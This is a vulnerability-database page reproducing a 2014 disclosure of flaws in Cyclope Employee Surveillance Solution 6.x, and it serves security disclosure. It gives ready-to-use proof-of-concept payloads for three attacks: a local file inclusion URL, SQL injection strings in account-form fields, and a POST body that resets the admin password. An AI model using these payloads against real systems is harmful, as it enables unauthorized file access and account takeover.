Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 15 Views

Cyclope Employee Surveillance Solution v6.0 v6.1.0 v6.2.0 has Multiple Vulnerabilities - Employee Monitoring Softwar

Code

                                                # Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.1.0 & 6.2.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html

# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.

# Vulnerability PoC 1:
# Local File Include
#
# Requirements: Employee access
# PoC:
# http://172.16.194.134:7879/help.php?pag=../../../../../../boot.ini%00

# Vulnerability PoC 2:
# SQL Injection
# Requirements: Employee access
#
# http://172.16.194.134:7879/index.php?pag=myaccount
# -Fields affected in form:
# -First Name
# -Last Name
# -Password / Re-Type Password
# -Email
# -mid
# Poc:
# mid=15&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email='
# mid=15'&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=
# and so on...

# Vulnerability PoC 3:
# Change Admin account's password.
# Requirements: Employee access
# http://172.16.194.134:7879/index.php?pag=myaccount
#
# Using a tool such as Tamper Data or Live HTTP Headers, change the value
# of 'mid' to 1
# PoC:
# Post Data: mid=1&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilities employee monitoring software sql injection local file include change admin account's password. cyclope-series product version 6.0 6.1.0 6.2.0 vendor website software download employee access form fields tamper data live http headers.
15